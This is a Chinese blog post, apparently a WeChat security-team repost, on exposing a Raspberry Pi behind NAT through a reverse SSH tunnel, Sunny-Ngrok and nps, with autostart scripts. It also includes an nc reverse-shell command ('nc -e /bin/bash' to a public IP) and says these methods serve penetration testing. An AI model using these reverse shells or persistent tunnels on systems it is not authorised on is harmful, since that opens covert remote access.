树莓派内网穿透总结【文末抽奖】

admin 2022年11月26日04:50:11IoT工控物联网评论11 views3099字阅读10分19秒阅读模式

题记

地球在缓慢地持续运转,而人们活在梦里      —— 村上春树 《海边的卡夫卡》


下面只是日常作者我自己用内网穿透的方法,在渗透测试里面也可以使用

简单说

a内网,b公网,c内网 在c内网怎么访问到a的内网里面,就和访问c内网其他主机一样?可以用花生壳内网穿透很简单就不多说了。 但是树莓派就不行了,如果进行,没有远程ssh就不行了,不能进行渗透测试

下面这2种ssh和nc方法只能算是临时的

开始操作

  1. 1. 反向ssh隧道从内网就可以做到 内网执行的命令

  ssh -fN -R 5555:localhost:22  [email protected]公网ip

服务器执行的命令

 [email protected] -p5555
  1. 2. nc反向反弹shell

服务器执行的命令

nc -lvnp 4455

内网执行的命令

 nc -e /bin/bash 公网ip 4455

花生壳树莓派问题

树莓派安装的是kali linux系统

花生壳地址https://hsk.oray.com/download/ 应为树莓派我安装的arm64位的,他只有32位的,安装不上 下面命令对32位的支持

dpkg --add-architecture armhf

反正还是安装不是,不知道怎么回事

树莓派内网穿透总结【文末抽奖】
在这里插入图片描述

树莓派用Sunny-Ngrok内网穿透

官方http://www.ngrok.cc/

树莓派内网穿透总结【文末抽奖】
在这里插入图片描述
./sunny clientid  隧道id
树莓派内网穿透总结【文末抽奖】
在这里插入图片描述

自启动http://www.ngrok.cc/官方说明

1、下载客户端

这一步就都不用说了大家都知道怎么操作。下载完成之后将客户端执行文件移动到 /use/local/bin 目录下并给予可执行权限。

sudo mv sunny /usr/local/bin/sunny
sudo chmod +x /usr/local/bin/sunny

2、编写启动脚本

sudo vim /etc/init.d/sunny 启动脚本代码

把代码里面的【隧道id】替换成自己的隧道id

#!/bin/sh -e
### BEGIN INIT INFO
# Provides:          ngrok.cc
# Required-Start:    $network $remote_fs $local_fs
# Required-Stop:     $network $remote_fs $local_fs
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: autostartup of frp for Linux
### END INIT INFO

NAME=sunny
DAEMON=/usr/local/bin/$NAME
PIDFILE=/var/run/$NAME.pid

[ -x "$DAEMON" ] || exit 0

case "$1" in
  start)
      if [ -f $PIDFILE ]; then
        echo "$NAME already running..."
        echo -e "33[1;35mStart Fail33[0m"
      else
        echo "Starting $NAME..."
        start-stop-daemon -S -p $PIDFILE -m -b -o -q -x $DAEMON -- clientid 隧道id || return 2
        echo -e "33[1;32mStart Success33[0m"
    fi
    ;;
  stop)
        echo "Stoping $NAME..."
        start-stop-daemon -K -p $PIDFILE -s TERM -o -q || return 2
        rm -rf $PIDFILE
        echo -e "33[1;32mStop Success33[0m"
    ;;
  restart)
    $0 stop && sleep 2 && $0 start
    ;;
  *)
    echo "Usage: $0 {start|stop|restart}"
    exit 1
    ;;
esac
exit 0

3、测试可执行代码

sudo chmod 755 /etc/init.d/sunny
sudo /etc/init.d/sunny start
sudo /etc/init.d/sunny start    #启动
sudo /etc/init.d/sunny stop     #停止
sudo /etc/init.d/sunny restart  #重启

4、设置开机启动

cd /etc/init.d
sudo update-rc.d sunny defaults 90    #加入开机启动
sudo update-rc.d -f sunny remove  #取消开机启动
树莓派内网穿透总结【文末抽奖】
在这里插入图片描述

搭建nps内网穿透

安装

下载

wget https://github.com/ehang-io/nps/releases/download/v0.26.8/linux_amd64_server.tar.gz

解压

tar -zxvf linux_amd64_server.tar.gz

下载安装

./nps install

启动

./nps start

他把文件安装在/etc/nps/ 他的配置文件在/etc/nps/conf/nps.conf 进入配置文件

vi /etc/nps/conf/nps.conf
树莓派内网穿透总结【文末抽奖】
树莓派内网穿透总结【文末抽奖】

配置完成后重启

./nps restart|

登录web

阿里云添加规则

树莓派内网穿透总结【文末抽奖】

访问

树莓派内网穿透总结【文末抽奖】

添加客户端

树莓派内网穿透总结【文末抽奖】
树莓派内网穿透总结【文末抽奖】

注意这个密钥下面会用到

树莓派内网穿透总结【文末抽奖】

树莓派安装

下载

wget https://github.com/ehang-io/nps/releases/download/v0.26.8/linux_arm64_client.tar.gz

解压

tar -zxvf linux_arm64_client.tar.gz

解压出来会有一个npc文件连接nps服务器

./npc -server=阿里云的IP:客户端连接的端口  -vkey=密钥

连接成功

树莓派内网穿透总结【文末抽奖】

配置隧道

已经连接上了

树莓派内网穿透总结【文末抽奖】

添加隧道

树莓派内网穿透总结【文末抽奖】
树莓派内网穿透总结【文末抽奖】

客户端ID在

树莓派内网穿透总结【文末抽奖】

配置结果

可以看见可以访问了

树莓派内网穿透总结【文末抽奖】

添加开机自启动

创建一个nps.sh文件文件内容

#!/bin/sh
cd 树莓派nps解压出来的文件目录
./npc -server=阿里云的IP:客户端连接的端口  -vkey=密钥

执行权限

chmod 777 nps.sh

添加启动

vi /etc/xdg/autostart/nps.desktop
内容
[Desktop Entry]
Name=nps
Type=Application
Exec=上面那个nps.sh文件地址


抽奖方式

关注公众号后台回复:抽奖
抽奖要求:
1、分享本文至朋友圈,且不可屏蔽分组(特殊情况除外);
2、请中奖后在当天22点前联系客服,并进行核实,过时取消资格;

树莓派内网穿透总结【文末抽奖】

0x0 师傅不加个群嘛

树莓派内网穿透总结【文末抽奖】

微信群后台回复获取进群链接

欢迎 点赞 + 在看并分享本公众号 给更多师傅们哈
❤️
----------------往期精选-----------------
文件系统取证分析-卷的效验分析
简单聊一聊对微信小程序渗透测试的思路
信息收集之-你不知道的骚思路
练习内网渗透的时候的一个靶场练习

注:壁纸来源互联网


原文始发于微信公众号(Drt安全战队):树莓派内网穿透总结【文末抽奖】

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月26日04:50:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  树莓派内网穿透总结【文末抽奖】 https://cn-sec.com/archives/1426952.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: